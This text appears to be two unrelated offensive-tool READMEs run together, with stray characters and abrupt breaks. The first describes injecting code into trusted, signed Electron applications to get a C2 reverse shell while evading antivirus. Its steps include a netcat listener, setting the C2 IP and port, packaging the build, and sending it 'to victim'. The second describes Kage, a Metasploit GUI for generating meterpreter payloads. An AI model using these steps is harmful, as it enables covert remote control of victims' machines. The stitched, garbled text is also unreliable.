Supports almost all operating systems
Supports almost all desktop applications developed based on Electron
๏จ All malicious operations are executed by the injected program, those commonly used trusted programs
Bypass of Network Access Control Policy for Applications by Zero Trust Sandbox
Verified that it will not be discovered by the antivirus software below
(Please note that a simple command call has been implemented here, and some behavior based heuristic checks will still prompt , bypass AV is not a key issue to be addressed in this project)
An increasing number of desktop applications are opting for the Electron framework.
Electron provides a method that can be debugged, usually by utilizing Chrome's inspect function or calling inspect through Node.js. In this project, the implementation of inspect was analyzed, and a method for automatically parasitizing common Electron programs was developed.
By establishing a connection with the Command and Control (C2) server, a simple remote control is achieved.
Due to the widespread trust of most antivirus software in these well-known applications (with digital signatures), executing malicious commands in the program context provides excellent concealment and stability.
For these injected applications, it is necessary to carefully consider the potential legal risks brought by such actions. When users analyze program behavior, they may be surprised to find that the parent process executing malicious behavior comes from the application they trust.
nc -lvnp 8899
clone this project
modify build.config
injected_app: The electron program you want to inject
c2: set c2_Public IP and c2_netcat Port
exec node build.js
, and then pkg to an execute program
Send to victim, and get electron_shellย
Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter
& android/meterpreter
.
Please follow these instructions to get a copy of Kage running on your local machine without any problems.
PATH
: You can install Kage binaries from here.
to run the app from source code:
# Download source code
git clone https://github.com/WayzDev/Kage.git
# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev
# to build project
yarn run build
electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with
yarn clean
.
Raw
format in dropdown list.I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.
Twitter: @iFalah
Email: ifalah@protonmail.com
Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/
node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc
electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue
This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.